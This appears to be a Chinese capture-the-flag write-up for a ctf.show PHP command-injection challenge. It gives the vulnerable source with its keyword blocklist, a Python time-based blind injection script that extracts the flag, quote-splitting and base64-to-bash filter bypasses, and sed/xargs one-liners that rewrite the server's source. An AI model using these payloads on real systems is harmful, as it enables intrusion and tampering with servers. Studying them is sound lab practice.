源码
<?php
error_reporting(0);
function check($x){
if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
die('too young too simple sometimes naive!');
}
}
if(isset($_GET['c'])){
$c=$_GET['c'];
check($c);
exec($c);
}
else{
highlight_file(__FILE__);
}
?>
思路
刚开始发现 ‘’ 和 “” 没被过滤,可以绕过关键词,当时无回显的话,可以用bash盲注
payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
,还有curl带出,我用的是 echo xxx | bas''e64 -d | ba''sh
,但是命令执行不了,求大佬解答
还有 tee 也可以创建文件
题解
解法1
改了下Y1ng师傅的脚本
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t
from urllib.parse import quote as urlen
url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c='
alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
for i in range(1,100):
for char in alphabet:
# payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #flag.php
payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
# data = {'cmd':payload}
try:
start = int(t.time())
r = requests.get(url+payload)
# r = requests.post(url, data=data)
end = int(t.time()) - start
# print(i,char)
if end >= 3:
result += char
print("Flag: "+result)
break
except Exception as e:
print(e)
中间的 . 应该是盲注的时候有一个数据包响应过长导致的
flag格式 : ctfshow{8-4-4-4-12}
解法2
用 tee 把 ls / 的输出,输出进文件里
?c=ls | tee 1
?c=cat /f149_15_h3r3 | tee 2
解法3
但是看到群主的解法的时候,被震惊到了,居然还能这么玩,可以直接改源码,tql
sed -i ‘s/book/books/g’ file 把book替换成 books
xargs 可以将管道或标准输入(stdin)数据转换成命令行参数,也能够从文件的输出中读取数据。
find . -name ‘*.xml’ |xargs sed -i ‘s/hello/world/g’
参考资料: https://blog.csdn.net/weixin_39731083/article/details/82495950
自己测试了下(多动手.jpg)
也可以用xargs sed批量修改文件
ls | xargs sed -i "s/die/echo/"
把die 替换成 echo
ls | xargs sed -i "s/exec/system/"
把exec 替换成 system
然后就随便玩了
?c=tac /f*
总结
Y1ng师傅 yyds